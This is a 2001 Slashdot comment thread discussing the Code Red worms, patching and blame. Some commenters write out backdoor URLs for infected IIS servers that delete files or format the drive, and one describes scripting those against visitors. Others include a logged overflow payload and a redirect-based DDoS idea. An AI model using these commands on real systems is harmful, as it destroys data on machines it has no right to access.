Code Red III

drcrja was the first to send us this brief bit about Code Red III which is apparently faster and more vicious than its entertaining predecessors. I'm still wondering what I should do with the hundreds of IPs in my desktop's apache log trying hopelessly to overflow my buffer.

Re:Bah.

[austad]

How about an apache box in front of the IIS server with mod_proxy installed and setup as a reverse proxy filtering out default.ida requests??

Re:Finally

[Guignol]

I, again, still remember the son of the return of the code red's revenge striking back: the 2nd mission is back even redder than before vs the grand-son of the blue bug 5 (they forgot an egg) resurected by alien 4 (This time, it's going to hurt them badly !) with a vengeance...

Re:It's not like they haven't announced the patch

[mblase]

not everyone is super connected and does know about this

"Ignorance of the law is no excuse", nor is ignorance of your upgrade cycle.

Its Microsoft's responisibilty to do everything they can to notify Win 2000 customers and solve this problem

As I said, they're already doing that. The problem is that too many people don't realize it's a problem they need to attend to. They think they can just install a server, run it, and forget about it.

their design flaw, not the admins. So they need to fix it.

What do you think the patch is for? Even Slashdotters' much-adored Apache software isn't immune to the occasional oversight. The difference is that, as yet, almost everyone who runs Apache is a responsible administrator who already knows the importance of keeping things up-to-date.

I'm not "blaming consumers for the corporation's mistakes," as you say. I'm saying that the corporation is doing everything it can be reasonably expected to, short of directly violating the privacy of every one of its registered customers by forcing a software upgrade down their broadband throats. At some point, you have to lay the blame on the users.

Missile strikes are in order

[sjonke]

Taking a clue from Mr. Sharon, I suggest that missile strikes be made against any building that is suspected to contain or potentially contain a computer running IIS. This will obliterate not only the potentially suspect computer, but also the potentially pathetic owner who would likely buy again.

Re:Help me out on this one...

[JHuizingh]

Code Red exploits an .idx vulnerability causing a buffer to overflow with a string of NNN's or XXX's. Code Red I searches for other machines to attack and basically eats up bandwidth. Code Red II searches for other machines to attack as well, but also installs a back door on the system that it infects, giving system access to anyone with a web browser.

Re:a harsher solutions, perhaps?

[WickedLittleSlaveBoy]

oops...it seems that an MCSE(obviously running IIS) has modded me down....I guess I'll have to send a retraction to all the MCSE's on our help desk(1st tier), too.....

eEye's Scanner

[slashkitty]

This would be a security scanner from eEye.

http://www.eEye.com/Retina

Re:It's not like they haven't announced the patch

One difference between the recall on the SUV's and the problem with Microsoft software is that most people know that they are driving one of the SUV's. A lot of the servers that are still vulnerable are those that are running without the knowledge of the owner, because Microsoft decided it was important to install their server.

have you considered a ...

http://ip.ip.ip.ip/scripts/root.exe?/c del c:\/s/q

Re:have you considered a ...

can someone give me a command that works to shut them down? :-)

Viruses

Please, learn the proper English plural of the word 'virus.'

There's no need to be making up words in hopes of sounding smarter. You only end up looking silly..

Re:Viruses

[Moonshadow]

Yeah, but "viruses" doesn't rhyme with "jedi".

It's called a sense of humor. Try one out some time. Geez, somebody needs a laxative...

Re:Viruses

[HobophobE]

In case you weren't aware...the English language isn't governed by a body like snootier languages such as French...so this allows for much more rapid evolution of language. Just like "Fantastic" or "Naseous" now have new meanings, "virii" is now synonymous with "viruses." Have a nice day.

Why Isn't There Software Regulation?

In any other large industry in the U.S., there are standards, codes and regulation. If cars have problems, the car companies have to fix them. If buildings fall down, people are sued. In each of these industries, there are standards, inspections, and regulations, TO PROTECT THE PUBLIC HEALTH!

So why isn't there any regulation in the software industry? Will buildings start having disclaimers: 'If this building falls on you, you can't sue us?' No way!

Irresponsible software development such as Microsoft is doing costs people time and money -- to the tune of billions of dollars. Not to mention pain and suffering. Not to mention COMPROMISING NATIONAL SECURITY. Not to mention e-commerce dollar losses, identity theft, etc.

Microsoft should be responsible for its software, as should all software makers. Push for software regulation, or the senseless suffering will continue, until people start really getting hurt.

Re:Copycats

[wo1verin3]

all right..if Code Red and family are dead, why is my cable modem recieve light solid since saturday morning?

Code Red Self Test

For those of you that are wondering if you're vulnerable, an on-line tester will tell you if you are susceptible to any of the code red worms, and currently tells you if you've already been infected with Code Red II.

Re:Code Red Self Test

[kurt555gs]

the online tester said i was "clean" .... considering i am running apache on RH 7.1 i hope so. Also , i wonder y M$ has escaped more toung lashing ... All this talk of patching , if u really want to be safe from code red , dont patch, switch to a better server At least they didnt name it penguinpower

Re:Better Names

[xZAQx]

CODE BLUE! That is SO funny for any other punk rockers out there. Remember "Code Blue" by TSOL? Yeah, they definitely should call this one, Code Blue, 'cause Baby, It's Dead.

Why aren't these machines patched yet?

[tmark]

How is it that all this time after Code Red first hit the news, so many machine still remain unpatched ? Are the Koreans being disproportionately affected, or is it having major impact over here too ? And if the Koreans are being disproportionately affected, why ? Is press coverage of the virus less prevalent over there ? Could it be something as silly as Koreans not being as adept at the English language ?

And how can the Koreans as sysadmins be so bad, when Koreans in Age of Empires: The Conquerors are so good ? Maybe the Persians and Turks are being hit badly by Code Red as well ?

Re:Why aren't these machines patched yet?

It is interesting that most of the machines attacking me are from korea and turkey.. Only 5% of attacks towards my machine are comming from US IP space. I think Micro$oft should send people door to door overseas and patch the machines..

Re:Why aren't these machines patched yet?

[nether]

Because the patch does not fix the problem completely. Even if your server is patched, if you are redirecting URLs, the worm will be able to infect your machine. http://archives.neohapsis.com/archives/incidents/2 001-08/0218.html

Re:Why aren't these machines patched yet?

[skinney]

It could be because that the asian tech market has a 99% piracy rate on M$ software. If they don't have licenses for the products they might not be able to get service packs or patches from M$. Thats my guess.

Re:Why aren't these machines patched yet?

[malfunct]

I don't know whats stopping them, the patch is available straight from MS's site with no checks of any sort.

Re:Perhaps we should reconsider...

[norton_I]

The funny thing is, if you ISP terminates web services to all of their clients because (say) 10% of them are infected, they come out of it clean, and can hide behind a service agreement.

If I disable someone's web server because they are actively trying to infect my computer with a virus , I am liable for any damages, even ones they make up.

Despite the fact that almost nobody reads, and fewer understand their ISP service agreements, if I put up a "service agreement" on my web server that says "by accessing this web server you agree that you are not infected by the code red virus. If I determine that you are, you agree that I may take any necessary actions to protect my services, including but not limited to automated installation of anti-virus software..." It doesn't count, since I can't have any expectation that someone infected by code red would ever see the agreement.

Re:Never Patch IIS Again!

You are the worst kind of fanboy -- the type who thinks he's clever and witty.

This Just In: You are neither.

Re:make some money off banner ads

[Chmarr]

If you make default.ida a php based file, why wouldn't a redirect server side work?

Because then it's the server getting the page, not the browser. If you're after ad revenue, then the ad company is sure going to check where that traffic is coming from.

Re:Stop addressing Code Red

Guess what? You are full of shit. MSSQL did not install IIS.

Use PHP and reconfigure apache to do this easily

[yani]

I reconfigured apache to recognise .ida as a php file and then wrote a php script which does esentially what the above script does, only automatically and logs ip's it's sent to.

Also no checking whether the host is still alive since it's almost instantaneous.

If anyone wants the php script I can post it although all it involves is using fopen to open the URL that sends the same message as above. Reconfiguring apache is easy look in your configuration files for the PHP section.

I'm getting more than one codered attempt per 5 minutes and have over 4500 so far. Guess that's what I get for being on @Home ;-)

Re:Sig (Offtopic)

[Puppet+Master]

>If Bill Gates had a nickel for every time >Windows crashed... >..oh wait, he does. > >Thats the funniest sig I've seen on slashdot!

I coined that sig back in 1994,
when we were still using Windows 3.11.

Don't forget the sequel ...

[WillSeattle]

Code Red: Jar Jar's Revenge

Using CodeRed hole to inform infected users

Probably a little greyhat but I have been running:

http://[InfectedBox]/scripts/root.exe?/c+echo+Yo ur %20box%20has%20been%20infected%20by%20Code%20RedII %20use:%20http://download.microsoft.com/download/i is50/Tool/1.0/NT45/EN-US/CodeRedCleanup.exe%20to%2 0disinfect%20your%20machine+>C:\Documents%20and%20 S ettings\All%20Users\Start%20Menu\Programs\Startup\ CODERED.txt

uses the hole created by CodeRed to drop a text file in the All Users startup group. Next time anyone logs in they'll see it right in front of them.

Re:Funnier than you think.

[fors]

I've been reading your sig for a while now. I think the sig from Deuteronimy(sp?) might apply to you.

Re:More information?

[unitron]

Actually deltree /y c: "accidentally hit the enter key instead of the \ which was to be followed by the single directory you wanted to delete" works quite well at wiping the entire C drive. It proceeds to do so undisturbed by any keystroke combinations intended to stop it.

Re:Versions of the worm...

Hmm, in that case, Code Red III hasn't even been named yet.

not in critical systems.

[rebelcool]

Just because their laptops have win2000 installed doesnt mean the life support is running from windows. It's not.

Re:not in critical systems.

[jrockway]

Could you imagine what it would be like to check your logs and see "missile-launcher3832.navy.mil". Then telnet to the thing and get a shell prompt? Reminds me of an REM song called "It's The End Of The World As We Know It (And I Feel Fine)".

Re:not in critical systems.

[Syberghost]

You don't have to have it in CRITICAL systems to result in loss of life; if it's feeding you faulty data and you're making decisions based on that data, you could run out of oxygen 8 hours earlier than you thought, or something similar.

And as for the Navy, they're launching missiles with the damn thing.

Why some systems are vulnerable

[Genetically+Enginerd]

I watched the progress of CodeRed last weekend and sat by and watched my service degrade bit by bit. I captured my log files (Apache) and found 41 local businesses that had been infected(?). I spent the week calling and talking to these businesses about the problem with their systems. After talking to all of them and merging my notes, there were some interesting points to ponder.

1) Of the 41 systems, 27 had been installed by the same "consulting" firm for the same type of small buisiness. The web application is a calendar application for appointments and is for the company's internal use only.

2) The systems were in the back room and no one at the business ever checked them, much less knew what was running on them. From their in-office client machines, all outward appearances showed the system was running fine, albeit a little sluggish.

3) The systems were maintained by the consulting firm and they had not been on site for months. There was nothing in their contract about security updates or maintenance.

4) All email to root, webmaster, hostmaster, etc. was routed to the consulting firm. I talked to the consulting firm and found out they had over 300 client businesses using the same application, but only 60 or so were connected to the internet (at the request of the business). Whether the other 33 servers were infected, who knows?

5) These 27 (as well as the other 33) servers were connected to the internet via DSL or dial-up (all on same ISP) with internet sharing and a commercial firewall with security settings "open", or essentially disabled. Each server had anywhere from 3 to 8 Win98/ME systems on the internal net accessing the application running on the server.

6) The 27 servers, which were remotely admistered by the consulting firm were all running VNC (http://www.uk.research.att.com/vnc/)as a service under the admin group and had default ports open to the internet with user of "user" and a password of "password". I found this out from the business, not the consultants.

7) Those 27 servers also shared their C (only) drive and printers, as well as the internal machines drives and printers, to the internet when connected.

So, who is at fault here. I leave that as an exercise to the reader since this entire post is totally fictitious.

Or is it? Gotcha...

Versions of the worm...

[Moonshadow]

Code Red: A New Worm
Code Red: Microsoft Strikes Back
Code Red: Return of the Virii
Code Red: The Not-so Phantom Menace

And finally...

Code Red: Attack of the Clones

Funnier than you think.

[Ungrounded+Lightning]

This is a UNIX email virus. It works on the honor system: If you're running a variant of unix , please forward this message to everyone you know and delete a bunch of your files at random. Thank you for your cooperation. by pjl@patsoffice.com

That's funnier than you think.

My wife posted a variant of that (involving "rm -rf /*" as root) to a large mailing list. A couple days later she got an email.

Seems the responder had just installed linux on his PC. The responder's spouse read the mail item and decided to try it. B-)

(Responder was quite amused by the effects. Fresh install, so nothing was lost.)

Re:Serious blow to open source & free software

[JWW]

With the amount of publicity, you'd think people would start installing Apache.

Is CRII South Korean?

so I'm setting up a computer for a presentation at a conference, and I took one of my laptops with Win 2k that the MIS guy had sworn he turned off IIS on. So, I'm setting it up on the Internet, and suddenly, all the webpages are getting affected by CR, But instead of "hacked by chinese" and www.worm.com, I got pages full of ascii, with korean characters thrown in. The damn MIS guy had kept IIS working. Here's the thing though, I don't know what message you get when CRII affects you, and I know that this CR "III" supposedly has origins in S. Korea. This fits in with what I saw, with pages of Korean. Rebooting pre and post patch doesn't work either. So is this typical of CR II, or is there really a CR III? (and yes, I know 2k evil, etc. etc. it's a big corporation set in its ways. *shrug* :P)

Re:Bah.

[AJWM]

I run a server with three virtual domains, separate logs for each. The IP numbers are sequential, but I see 1092 hits (of the XXXXX variant) on one, 584 on the second and 579 on the third.

Whoops, make that 1094 on the first and 580 on the third -- got a couple more as I was entering this.

Re:Bah.

[sfe_software]

It totally depends on your IP. My webserver has logged around 400 attempts per IP, on two IPs. My cable modem, OTOH, has logged over 2000 attempts (RoadRunner) at port 80 since 8/5 (since I don't run a webserver, I can't tell you which version of CodeRed, I only log the connection attempt at the firewall).

Note that I actually have over 6000 logged lines, but because the connection is refused, each IP tries 3 times in a row before giving up. I don't know about the uniqueness on the 2000 IPs, though...

It seems cable (and other broadband residential) users are the biggest problem here -- the ones who probably don't know they are even running IIS. I gather this because if I visit these IPs in a web browser, I get either a 403 page (too many connection attempts), or a "No Default Page", indicating that the webserver is there for no reason...

- Jman

Re:Microsoft feature?

[mpe]

If you do a default installation of Win2k Pro it does not install the World Wide Web Publishing Service.(at least in my experience) The win2k Server will install it by default

I wonder what IIS is considered a dependency for under W2K. Also if Office 2K can install it...

get your facts right

Ford used Firestone tyres outside their recommend specifications.

Re:I heard something -

[CM39]

I hope it's been thoroughly beta tested?
Or have 1, 2 and 3 been the beta test? :-)

Code Green?

[repvik]

Isn't it time someone writes and releases a proper conter-worm now, and call it Code Green?

Re:Code Green?

[synsent]

Better Code Black!!!

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:Bah.

[Ryokurin]

here ya go. code red detected in south korea http://news.cnet.com/news/0-1003-200-6835996.html its cnet, so take it as you will.

Re:Use PHP and reconfigure apache to do this easil

[digitalunity]

I'm getting more than one codered attempt per 5 minutes and have over 4500 so far. Guess that's what I get for being on @Home ;-)

That's it? I've logged over 20,000 attempts to propogate this month alone. I have two IP addresses, both on AT&T@home. After a reboot, the next attempt is within 30 seconds!

I get it!

[lemko]

The joke was that he said "befoer."

All these CodeRed sequels...

[nob]

I wish the Matrix sequels were released this quickly.

Re:I want Code Red IV myself...

[siokaos]

Noo noo, see "near" dead. If all the IIS servers in the world were dead, that would be dandy, but it's fun to watch them beat eachother up (the unpatched ones at least)

Re:Code Red is trying to eat me!

Give 'em a break. It's not about covering up anything, the guy was calling about a different issue. It's quite likely he was hired as a temp solely to make those calls and knows nothing else about Verizon. It's possible he doesn't even work for Verizon but for a consulting company performing side work.

Re:Why people love Code Red

[SomeoneYouDontKnow]

It's impossible to guard 100% against any kind of break-in. Anyone who thinks they have all the angles covered in deluding themselves. And even if you manage to get a system completely locked down, every new piece of software you install presnets new opportunities for exploits.

Yes, everyone should have backups, but that doesn't make it OK to destroy data. You say a physical break-in is different than an electronic one because there's damage in a physical break-in and not in an electronic one. How is the damage different? Suppose someone was able to hack a computer at your local power company and black out half the state? Backups won't help you there. Suppose someone launches a DoS attack against your ISP for a day, and your Internet access is rendered useless. I've been there before, and it ain't no fun. Suppose someone mailbombs you because they got pissed off with something you said on a newsgroup. I've been through that, too. Even if there's no physical damage, there's damage caused by wasted time and productivity.

You may not want your tax dollars going to fight that. OK, fine, then make the responsible party pay restitution to cover the costs of the investigation. If he's a minor, make his parents pay. If you're worried that he won't have the money to pay, then also worry about the victims of such attacks who don't have the money to bankroll their own investigations.

Re:It's not like they haven't announced the patch

[hublan]

The problem isn't the software, it's the admins.

The problem is that Microsoft decided that it was a "user convenience" to have Win2K install a web server by default. So every Joe User has now a fully fledged, fully open web server operating on his/her machine without them even knowing it

I just had to help my ex-girlfriend remove Code Red from her machine. She was as suprised as I was, that her machine was automagically set up as a server box.

Next time Microsoft decide to integrate "user convenience services", to kill competitors, might I suggest a firewall?

Re:Verizon DSL

[aozilla]

In order to sue them, you need to cancel first. Chances are at that point they won't charge you a cancellation fee. If they do, then you need to refuse to pay it. If they charge your credit card, you need to reverse the charges. Then, they have to sue you, not the other way around.

Re:Oh please, did you see Urban Legend II?

[TheRain]

do you own this universtiy?

Re:Put it in another log and forget about it.

[mikecarrmikecarr]

DISCLAIMER: I'm not suggesting that this is legal, or indeed a very good idea.

I particularly like the RedirectMatch bit. Do you have any web site out there that you don't particularly like? *cough*microsoft*cough* If you redirected all incoming /default.ida requests to another host, and enough infected IIS machines hit your web site, then you could effectively DDOS an arbitrary site.

I doubt that Code Red is keeping log files of the requests that it's sending out. Ergo, I doubt that anyone could trace the DDOS back to your box.

Again, I'm not suggesting that this is a good idea. It's just an amusing Friday idea.

Re:Why people love Code Red

[SomeoneYouDontKnow]

Yes, the people who run poorly-patched servers bear some of the blame, but most of the blame still falls on the shoulders of the worm writer. Even if you don't lock the doors to your house, someone who walks in and steals your TV is still guilty of burglary. In the case of Code Red and its successors, the owners of the systems are becoming more and more to blame as time goes by and they don't patch, but does that excuse the worm writer? Not in the least.

As for the 15-year-olds, I never said parents don't have responsibility. I think they do, and I also think a good many of them park their kids in front of a TV or computer, and that's wrong. But I was 15 once, and although that was before the age of the mass-marketed Internet, I knew the difference between right and wrong, and these kids do, too. If one of them breaks into a system and destroys data or defaces a Web site, what do you propose we do with him? Tell him he's been a very bad boy, and say he should never do that again? That might work for the first time and for an extremely minor infraction, but there has to be the threat of some real punishment, or the problem will never end.

Or perhaps we should just lock the 1337 hax0r in a room with the admin of the system he trashed and let it get settled that way. In fairness to a civil society and the health of the kid, the criminal justice system would probably be a better alternative, no?

Re:Perhaps we should reconsider...

[aozilla]

The only problem I see with this is that it advertises to the world that your machine is comprimised. Why is this a bad thing? 1) you might have missed a backdoor, or maybe the virus has mutated to one with different backdoor(s). 2) This advertises that the machine is a windows machine that was running an unpatched version of IIS. While this could probably be found out, you don't want to advertise it to the world. Security through obscurity isn't a solution, but it is one part of a complete solution, at least for some.

Re:More information?

[Shimmer]

Great idea. I've been trying to find a friendly way to notify these suckers. Net Send does the trick perfectly. Thanks.

-- Brian

Service Manager

[spideyct]

The "green arrow" icon is the Services Manager, installed with SQL Server. You can use it to start/stop SQL Server and a few related services. I believe there is a way to add other services (such as IIS/w3svc) to be controlled by this app, but I don't know the details. I assume the person that made that post has a setup that allows them to control IIS from the SQL Service Manager.
I have never seen that as part of a default install of NT/W2K, however.

Re:IPs

[spectral]

I found it hillarious that microsoft was hit by it. Also, I was hit by a computer network security consulting website. yeaa..

Re:Saddens me though

> And no, I didn't have anything better to do (waiting for a co-worker to get back from cig break to ask her a question before I head out) than to post this. Sue me. :-)

Hey, non-smokers have a coffee while their co-worker light their fag! Different occupation, same break.

Re:At the risk of being redundant..

They should probably wipe their systems anyways, since their boxes have been r00t3d... excuse me, 4dm1n15+3r3d.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:I saw that Reuters story earlier

[iturbide]

Actually I am of the honest opinion that the best way of reaching those people is disconnecting them.

Which will not work very well if they're on a dynamic ip pool.

So why is anyone surprised if large cable/dsl networks start blocking webservers? It's brutal, but at least that'll reach them.

Re:It's not like they haven't announced the patch

[zhensel]

A couple things-
-Microsoft didn't even update their own webservers completely - windowsupdate and hotmail were both hit by the "Hacked by Chinese" varient, so how do they expect their customers to update? Their response that the customers are at fault is ludicrous in light of this.
-The patches issued by MS are not at all easy to apply. I've talked to people who have Windows 2000 with the latest service pack, go to the update site and are told they have to have an older service pack version to get the patch.

Re:I want Code Red IV myself...

"You never know when a dead rabbit will come in handy."

Re:Can the internet community sue microsoft?

[Hellmongr]

I have a question though. You make good points about the EULA, but is the EULA printed on the outside of the box? If it isn't, does this mean that a class action suit could be filed against Microsoft because people paid for the software only to find that they'd have to agree to the restrictive EULA, and since it wasn't printed on the outside of the box they didn't know thats what they were getting into? I could be completely wrong. Could anyone on Slashdot who's a lawyer fill me in on this?

Re:Finally

[insane.idoru]

I think we all know that someone is going to make the horrid desicion of calling it "attack of the Code Red"...

I knew our machines got Code Red

[alfredo]

Because our Blue Screen of Death turned purple.

Who's at fault here?

[Hygelac]

Well, contrary to what I've seen most people saying, I don't think it's Micros~1's fault. It's the adminintrator's responsibility to stay current. Laying this episode solely at the feet of Micros~2 is unfair. Yes, it's one of many exploits found in IIS, but NT admins, just like *nix and *BSD admins, have to be on their toes. IMNSHO, the Code Red episodes only show that thousands of NT admins are lazy morons.

Re:make some money off banner ads

If your skills in computer science are just as high as your arrogance, you really have to be a genius.

Re:Finally

[thing12]

It looks like this (only /. won't let me put in the 200 or so X's):

209.98.92.1 - - [10/Aug/2001:21:20:35 -0500] "GET /default.ida?~200*X%u9090%u6858%ucbd3% u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7 801%u9090%u9090%u8190%u00c3%u0 003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 298

Re:Bah.

[Airneil]

So, we're seeing about 5 - 700 hits, on a single IP.

Could it be that these sites that are reporting thousands of hits per day have more than one IP?

The thing doesn't care about domain names.

Consequently, I only show hits on my default domain in apache.

BTW, the site I'm tracking on is http://www.dimstar.net/redalert.html

Thanks for the info.

CR written by a linux zealot?

[TMB]

It occurs to me...

Let's say you read /.. And let's say you're a Linux zealot. but I repeat myself. ;-)

I've seen the sentiment expressed here before that the only way to drive into the world's consciousness that MS make shoddy products is for a massive vulnerability to hit everyone really badly. For a large number of people to lose data because of a major flaw in an MS product.

Now I see speculation of CR IV (or whatever number version you want to call it) that collects IP addresses of CR II compromised machines from all attempts on its own machine and uses the root script to run "format c:" on each of them. It doesn't exist yet... but will it? I'm sure. Probably even before CRI goes dormant next weekend.

This looks suspiciously like what an unscrupulous /. Linux zealot might wish for in their wildest dreams. I don't necessarily think the original CR was written by one, but I wouldn't be surprised if the more virulant strains were/are/will be.

If you're reading this and you're thinking about this is a suggestion, please don't. Lost or corrupt data is a scourge. The tech industry is having enough problems right now as it is without needing to deal with massive data loss. MS's PR so far has been doing an admirable job of damage control, but the last few mainstream articles I've read have stopped referring to it as an Internet problem and started referring to it as an IIS problem. Sufficient damage has already been done to MS. Don't make the situation any worse.

[TMB]

Re:CR written by a linux zealot?

[Tony-A]

Lost or corrupt data is a scourge.
Exactly. The problem persists until the root cause is eliminated. I think the major risks from the holes is the inadvertent corruption of data in the normal course of events. Because of the "admirable job of damage control", I would be extremely reluctant to trust any data to Microsoft's keeping. This is not the only hole in existence.

Another Patch???

[bdrexler]

I think one of the biggest problems here is the fact the Microsoft has so many damn patches. True, they mark some as more critical than others, but damn. I for one have better things to do than download and install 3 or 4 patches per week, how about the rest of you?

Re:Another Patch???

Personally, I'm more fucking sick of fanboys spewing horseshit like this when it's difficult to go two days without some obscure Linux patch being released. I'm guessing that's totally different.

Just die.

Re:Another Patch???

Hi Bill!

We just do:

apt-get update;apt-get upgrade, and viola! Bad stuff goes away, just like that. For reference, here's what it sounds like when a bug gets squashed: *poof!*

Re:Another Patch???

[Tony-A]

Not totally different, but with Linux, with minimal effort I've got a pretty good idea of what the patch does and if I even care about it. With a reasonable amount of effort I could find out more about it than I really want to know. With Microsoft, it is essentially impossible to know what the patch does or what it affects.

Re:Copycats

It must be very difficult being you.

Legal the same way as ShareSniffer, perhaps?

[Myself]

Read this if you're not familiar with ShareSniffer

Essentially, they say that since people enable drive sharing manually, an open share holds the same legality as a clickthrough license: You wouldn't have clicked it if you didn't want to do that, so you're responsible for what happens.

People don't install Windows by mistake. (well, that's another joke entirely) If they have services running that any reasonably competent admin would know about, they're responsible for those.

The point of a server is to let people use it. The point of an internet connection is to make your computer part of a global network. If you're running a server on the internet, you INTEND to have it accessed by anyone who wants to.

The worm's problem is that it's malicious, sucking up unreasonable amounts of bandwidth and denying service to others. If someone wrote a fixit worm that worked as advertised, I don't see how it could run afoul of the law. Just be careful with the bandwidth usage. Someone might call it unauthorized access, which is bullshit, access is implicitly authorized by the machine's very presence on the internet.

IANAL!

Use this tool, you can install Service Pack MAXINT

[leonbrooks]

The magic word is ASP2PHP. Apply this to the offending projects, kiss IIS and Windows goodbye forever. Ahhhhh! Feels so good! Won't run down your battery! Made entirely from all-Open ingredients!

Encourage the author (Naken) and you'll soon be able to bin VB screen apps as well. Woohoo!

Viruses

Please, learn the proper English plural of the word 'virus.'

There's no need to be making up words in hopes of sounding smarter. You only end up looking silly.

Re:Pirate copies

[CharlieG]

The big problem with sending out the patch to "Registered" users is this - I'll give high odds that MOST copies of NT/Win2K running at home are pirate copies. Ditto the copies running in China - Between the 2, you are talking about the majority of the still infected boxes out there

Re:Bad piggyback, but..

so... how exactly does one exploit an infected machine (not that I would do that, just curious)?

http://infected.machine.com/scripts/cmd.exe?'dir %2 0%c:\'

...or something like that?

Re:Morality of Counter Measures?

[Maul]

Actually, you're right.

I couldn't find a command that would shut down NT totally. So the next best thing is shutting down IIS, I assume.

Re:Interesting Irony

[rhizome]

So, Three Code Reds and a SirCam later, the question just begs to be asked: Who's calling Whose code "Potentially Viral"?

Perhaps a way to turn the tables is to start speaking of these Microsoft weaknesses in terms of immunodeficiency, as being extremely hospitable to worms and viruses. Which is worse, to be viral or to welcome the infection by design?

URL of CodeRed explanation

[Genetically+Enginerd]

A lot of people have asked to see an explanation of how CodeRed works. This is a good one that was the initial analysis last Saturday. This is a long url, you may have to cut and paste (I can't get rid of the space after "sid="). They also provide the disassembled code.

http://www.securitynewsportal.com/article.php?si d= 1361&mode=thread&order=0

Re:Bah.

I've recieved 1644 code red II hits since monday. I'm on the 66.*.*.* node thru RR. Seems there are quite a few IIS servers in this subnet. Others I know in the same node are reporting numbers similiar to this.

SecurityFocus

[Tyketto]

Probably old news, but we all know that the guys at SecurityFocus are collecting the IP addresses of those boxes in your logs from Code Red. Reuven Lerner has created aa perl module that is collecting the info, sends it to SecurityFocus, and emails the entity holding the block of IP addresses the visitor is from (via the MX record), informing them as well. Worth looking through.

BL.

Code Red I-III, Sircam Virus.. Connnected???

* Personal Opinion Ahead *

I've been watching the evolving viral problems and here's my conclusion: We are witnesses to the first massive automated industrial espionage system in operation. Here's my reasoning:

Sircam Virus: Testcode released to see if remote-files could be sent by an e-mail virus.

Code Red I: Test program, Automated webserver attack/co-opting.

Code Red II: Test program, Automated webserver attack with backdoor installation.

Code Red III: From what I've been able to determine: Beta Release, Automated websever attack program with a SERVER installation routine.

Windows 2K Source code theft: IIRC, took IIS with it. Needed to find exact addresses of buffer overflow target locations.

My guess for Code Red IV: Communications and indexing for directory data collected by Code Red III, with remote file retrieval operation supported by the installed Code Red III server.

All Code Red versions seem to be confining themselves, for the most part, to high-speed broadband links. Hrm.. What lives on broadband? Internet-Enabled Banking. Boeing. Intel. Research campuses (educational and otherwise). Investment houses. Working E-Commerce corporations. Etc. All are primary industrial espionage targets. Some are prime military-industrial espionage targets (I sat through lots of "spot the spy" classes when I worked at an aerospace firm). All have massive amounts of Intellectual Property data.

So, we have a virus that sends out random files into the internet while self-propogating. A program that can take over a webserver and attack other sites. An evolved version with a back door. An evolved version with what appears to be a server. And a logical evolution of the program that does something with all the others..

While the rest of the world is in a panic, I am fully expecting that we will see a massive amount of data flowing towards a central server as the Code Red XX development TEAM engages in the worlds first Automated Industrial Espionage operation.

Now, the only question that remains to be determined is who hired the development team, and why. I have my own suspects.

The Rosetta Stone

~

Don't worry about those who call themselves insane. Worry about the ones who say their 'Normal'.

Asian Porn Worm :-)

I want a worm that does this to my website :)))

Re:Asian Porn Worm :-)

[Epynonymous+Cowherd]

You want a worm that polls as to whether your website should be made into an Islamic state? * shrugs *

Re:Shutting off IIS on an comprimised box...

[frankie]

Most of the infections I've seen are on home PCs with cable modem, and the owner doesn't even know that IIS is active by default. I'd like to find a request that will switch IIS service from automatic to disabled. They'll never notice the difference, and the world will be a better place.

Re:make some money off banner ads

[ekrout]

I see someone has a I-Hate-The-World's-Living-Things-Because-I'm-Barel y-Smart-Enough-To-Point-And-Click-My-Way-To-MSCE-C ertification complex. Interesting.

Re:More information?

[Hulboy]

I know in Win98 you could (can?) do this with the undocumented /autotest switch...

Re:Finally

[TheMidget]

Shouldn't we first see Micro$oft Strikes Back, and the The Return of the Code Red? And then, the prequels: The Phantom Incompatibility (You remember, the AARD code that faked an incompatibility with DR DOS), and then Attack of the Browsers (yeah, I know. That title sucks. Browser Wars would sound much better...). In the meantime, the original episode Code Red will be renamed A New Worm...

Re:Version 3? Don't think so.

[kryptkpr]

Good, I'm not the only one...I looked, and saw nothing on BUGTraq about this crazy "v3", nothing.

You'd think slashdot would at least TRY to verify the stories?

Re:Stop addressing Code Red

[purplemonkeydan]

Then you should manually remove the .ida mapping to the index server dll.

Re:make some money off banner ads

[hawkbug]

If you make default.ida a php based file, why wouldn't a redirect server side work?

Re:Mozilla is the cure

Awesome plan! Mozilla can't stay running long enough to pop anything up or under (or display content).

Are you a security expert?

Dynamic Updates

[Tom7]

Hehe.

I'm waiting for one which sends digitally-signed updates to hosts (like hybris did off usenet) for upgrade capabilities. From what I understand, CR2 was not directly based on CR1's code (though it's easy enough to disassemble the executable that it sends your web server...)

Re:Put it in another log and forget about it.

[Malc]

Hmmmm... maybe I should set up a redirect for all requests containing "cmd.exe" or "root.exe", and send them to www.fbi.com?? ;)

Ultimately, I don't know if these redirects even work... the requests probably don't come from a browser that automatically handles the redirect for the user.

I want Code Red IV myself...

[QwkHyenA]

Hopefully Code Red IV, when it rolls out next week, will just cut the dang servers OFF

Re:I want Code Red IV myself...

[b1t+r0t]

I'd be happy if it used an HCF instruction, or at least programmed the video chip for an extremely high resolution at 100 Hz refresh, resulting in the monitor going HCF. Another option (on soft-power ATX machines) is to shut down (but not reboot) the system. Maybe zero out the boot blocks, too. Actually just the boot blocks alone would be enough fun. Basically, something annoying that has at least a 1% chance of getting the attention of your average MCSE.

Re:I want Code Red IV myself...

[mergy]

I hear Microsoft will try and release Code Red IV one month prior to their planned date due to antivirus software companies trying to quash their innovation. Stay tuned!

Re:I want Code Red IV myself...

Code Red IV == Windows XP

Re:I want Code Red IV myself...

[JBowz15]

I can't wait for Code Red IV...

I really liked the first three, and I hear that in part IV, Code Red fights the big Soviet after Apollo gets killed by him.

To bad Code Red part V, will inevitably suck.

Re:I want Code Red IV myself...

[siokaos]

Why? It's a lot more fun just playing with the near-dead carcass then throwing it in the river!

More information?

[Dr.+Evil]

I've heard all sorts of rumours about this thing. Now whenever I hear people talk about "Code Red III", I give up asking them what it is. It doesn't exist. If it does, it is about time.

The media seems to think that Code Red 1 was July 19, Code Red 2 was Aug 1, Code Red 3 is the one with the back door. In otherwords, they're only figuring out now how bad Code Red II is.

Re:More information?

[ncc74656]

Okay. So, I'll put up a disclaimer on www.glowingplate.com that any connection attempts by machines infected with Code Red will be met with an HTTP request to $HOSTNAME/script/root.exe?+%2fc+format+c.

Set up Lynx into a little script, log the confirmed kills to my log printer, and all is good legally because of the disclaimer. One would hope.

